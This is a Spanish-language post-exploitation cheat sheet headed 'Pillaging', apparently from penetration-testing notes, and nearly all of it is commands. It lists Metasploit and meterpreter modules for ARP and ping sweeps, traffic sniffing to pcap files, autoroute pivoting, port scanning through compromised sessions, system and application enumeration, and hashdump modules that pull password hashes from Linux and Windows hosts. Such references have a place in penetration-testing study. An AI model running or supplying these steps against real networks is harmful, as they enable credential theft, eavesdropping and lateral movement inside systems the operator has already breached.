Pillaging

Nmap

proxychains nmap -sT -open -n -Pn <CIDR> --top-ports 25

Metasploit

ARP

# Desde sesión de meterpreter
run arp_scanner -r <CIDR>
use post/windows/gather/arp_scanner
set RHOSTS <CIDR>
set SESSION <id-session>
run

Interfaces de red

# Desde sesión de meterpreter
ifconfig

Tabla de enrutamiento

# Desde sesión de meterpreter
route

Servicios de red

Linux/Unix

netstat -antupo
  • -a = todos los sockets.

  • -n = hosts, puertos y usuarios en formato numérico.

  • -t = TCP.

  • -u = UDP.

  • -p = PID (Process Identification Number) y nombre del programa.

  • -o = timer.

Windows

netstat -ano -p <protocolo>
  • -a = todos los sockets.

  • -n = hosts y puertos en formato numérico.

  • -o = PID (Process Identification Number).

  • -p = TCP, UDP, TCPv6 o UDPv6.

Ping sweep

use post/multi/gather/ping_sweep
set RHOSTS <CIDR>
set SESSION <id-session>
run

Sniffing

# Desde sesión de meterpreter
use sniffer
sniffer_interfaces
sniffer_start <id-interface>
sniffer_dump <id-interface> /<path>/<name.pcap>
sniffer_stop <id-interface>

Escaneo de puertos

# Tabla de enrutamiento
# Incorporación manual
route add <subnet> <netmask> <id-session>
# Desde sesión de meterpreter
run autoroute -s <CIDR>

# Metasploit
use auxiliary/scanner/portscan/tcp
set RHOSTS <CIDR>
set THREADS 10
set PORTS <ports>
run

Aplicaciones

# Windows
use post/windows/gather/enum_applications
set SESSION <id-session>
run

Enumeración automatizada

# Linux/Unix
use post/linux/gather/enum_system
set SESSION <id-session>
run

# Windowsh
# Desde sesión de meterpreter
run winenum

Hashdump

# Linux/Unix
use post/linux/gather/hashdump
set SESSION <id-session>
run

# Windows
# Desde sesión de meterpreter
hashdump

Última actualización